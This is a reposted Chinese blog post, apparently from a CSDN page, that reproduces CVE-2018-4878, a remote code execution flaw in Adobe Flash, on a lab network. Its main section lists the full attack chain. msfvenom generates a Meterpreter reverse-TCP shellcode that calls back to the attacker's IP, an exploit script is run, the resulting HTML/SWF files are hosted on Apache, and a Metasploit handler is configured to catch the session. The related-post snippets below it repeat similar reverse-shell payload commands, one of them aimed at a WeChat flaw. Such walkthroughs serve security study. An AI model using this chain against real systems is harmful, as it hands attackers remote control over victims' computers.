Flash 零日漏洞复现(CVE-2018-4878)

最新推荐文章于 2021-04-19 22:10:38 发布
最新推荐文章于 2021-04-19 22:10:38 发布
阅读量207 收藏
点赞数
文章标签: python git
原文链接:http://www.cnblogs.com/sch01ar/p/8575441.html
版权

项目地址:https://github.com/Sch01ar/CVE-2018-4878.git

影响版本为:Adobe Flash Player <= 28.0.0.137

攻击机器IP:192.168.220.152

目标靶机:192.168.220.151,浏览器为360浏览器

用msfvenom生成一个shellcode

┌─[root@sch01ar]─[~]
└──╼ #msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.152 lport=6666 -f python>shellcode.txt

 获取shellcode.txt的内容

┌─[root@sch01ar]─[~]
└──╼ #cat shellcode.txt

把shellcode.txt里的内容替换cve-2018-4878.py中的shellcode内容

运行exp

┌─[root@sch01ar]─[~/CVE-2018-4878]
└──╼ #python cve-2018-4878.py

 把exploit.html和exploit.swf移到/var/www/html/下

┌─[root@sch01ar]─[~/CVE-2018-4878]
└──╼ #cp exploit.swf /var/www/html/
┌─[root@sch01ar]─[~/CVE-2018-4878]
└──╼ #cp exploit.html /var/www/html/

 开启apache2服务

┌─[root@sch01ar]─[~/CVE-2018-4878]
└──╼ #service apache2 start

 开启msf

┌─[✗]─[root@sch01ar]─[~]
└──╼ #msfconsole

 然后一系列的配置,开启监听

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.220.152
lhost => 192.168.220.152
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit -j

 

用靶机的360浏览器打开地址:http://192.168.220.152/exploit.html

msf会返回一个会话

执行命令

 

转载于:https://www.cnblogs.com/sch01ar/p/8575441.html

andiao1218
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cve-2018-4878漏洞复现
06-02 4568
靶机:Windows7 sp1 条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行) 所需工具已上传 kali:192.168.43.16 (需要输入的命令均用&lt;&gt;标记出来,&lt;&gt;不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量...
Flash漏洞CVE-2018-4878复现
锋刃科技的博客
07-29 1340
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
微信 0day漏洞复现
热门推荐
星落的博客
04-19 1万+
目录 漏洞简介 影响版本 CS安装 漏洞复现 修复建议 漏洞简介 由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限 影响版本 <=3.2.1.141(Windows系统) CS安装 下载地址链接:https://pan.baidu.com/s/19En7Pkz7HIeey82PUvEBwQ 提取码:fczw 在ka...
Adobe Flash cve-2018-4878漏洞复现
weixin_34391854的博客
05-16 269
漏洞概述2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。gongji者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打...
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现
WY92139010的博客
07-03 257
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现 一、漏洞描述 该漏洞可针对windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。 二、漏洞影响版本 Flash Player版本28.0.0.137以及之前的所有版本    三、漏洞复现环境搭建 攻击机:kali...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制
CVE-2018-8120 poc
05-24
Supports both x32 and x64. Tested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64.
某信0day漏洞复现
qq_46331143的博客
04-19 423
测试流程: 攻击机:kali,192.168.43.200 受害机:win10,192.168.43.107 测试版本: 首先生成一段shellcode: msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.43.200 lport=5555 -e x86/shikata_ga_nai -b "\x00" -i 15 -f num -o /root/payload.txt 此时在root用户家目录下生成了一段shellcode代码的txt文
Flash 0day漏洞CVE-2018-4878复现
weixin_44897902的博客
10-14 435
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
漏洞复现 CVE-2018-4878 Flash
weixin_44664530的博客
04-21 218
受影响版本 漏洞复现环境 Kali Linux Windows 7 sp1 cve-2018-4878.py flashplayer_activex_28.0.0.137.exe 工具自行下载 链接:https://pan.baidu.com/s/1Q-ryRThsdhsvOIc_Q5E9Bw 提取码:owad 环境配置 将flashplayer_activex_28.0.0.137.exe安装...
[漏洞复现] CVE-2018-4878 Flash 0day
神仙哥哥的博客
05-23 2751
1、漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞CVE-2018-4878)。 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 直到2018年2月5号,Adboe才发布补丁来修复此0...
CVE-2018-4878复现
大方子
10-07 4318
前言: CVE-2018-4878利用flash漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
[漏洞复现]Adobe flash player 28(CVE-2018-4878
好好学习,天天向上
02-05 409
攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。 环境: 渗透机 Kali Linux ip:192.168.43.177 靶机 Windows 7 sp1 192.168.43.196 exp:cve-2018-4878.py 来自https://github.com/HuanWoW...
OpenSSH 安全漏洞(CVE-2018-15473)
最新发布
08-04
OpenSSH 安全漏洞(CVE-2018-15473)是一个影响OpenSSH版本小于7.7的漏洞。要复现这个漏洞,可以按照以下步骤进行操作: 1. 首先,需要搭建漏洞环境。可以使用vulhub提供的Docker镜像来搭建环境。具体的操作命令如下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值